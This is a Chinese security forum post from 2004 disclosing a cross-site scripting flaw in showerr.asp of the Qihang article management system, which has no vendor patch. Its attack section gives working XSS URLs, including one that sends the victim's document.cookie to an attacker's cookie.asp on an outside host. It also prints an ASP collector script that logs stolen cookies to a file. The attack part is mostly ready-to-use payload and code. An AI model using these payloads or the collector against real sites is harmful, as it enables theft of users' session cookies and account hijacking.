[原创]启航文章管理系统存在跨站脚本漏洞

hak_ban[HSG]

晶莹剔透§烈日灼然

Rank: 1

E.S.T论坛贵宾

帖子: 137
精华: 4
积分: 3301
阅读权限: 60
性别: 男
在线时间: 0 小时
注册时间: 2004-10-21
最后登录: 2005-7-29

发短消息
加为好友
当前离线

楼主大中小发表于 2004-12-28 23:42 只看该作者

[原创]启航文章管理系统存在跨站脚本漏洞

本文作者： rain[B.C.T]
文章出处：原创 http://www.bnso.net
阅读次数： 424
发布日期： 2004-12-8
受影响版本：
启航文章管理系统目前所有版本

漏洞描述：
showerr.asp存在跨站脚本漏洞，恶意者可以构造有效连接非法获得远程用户cookie。

攻击方法：
http://www.target.com/showerr.as ... <script>alert(document.cookie)</script>
http://www.target.com/showerr.as ... rMsg=<script> document.location='http://yoursite.com/cookie.asp?'%2Bdocument.cookie
</script>
其中“%2B”代表“+” 。

cookie.asp如下，即可收集cookie：

quote:
--------------------------------------------------------------------------------

<%
Testfile=server.mappath("info.txt")
Msg=request.servervariables("QUERY_STRING")
Set fs=server.createobject("scripting.filesystemobject")
Set thisfile=fs.opentextfile(testfile,8,true,0)
Thidfile.writeline(""&msg&"")
Thisfile.close
Set fs=nothing
%>

--------------------------------------------------------------------------------

厂商补丁：

启航文章管理系统
-----
目前厂商并没有发布了升级补丁以修复这个安全问题

白痴狗将会离我们而去, 需要怀念白痴狗的朋友, 请发消息给白痴狗的QQ (PS:白痴狗QQ会永远在网上开着)

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [原创]启航文章管理系统存在跨站脚本漏洞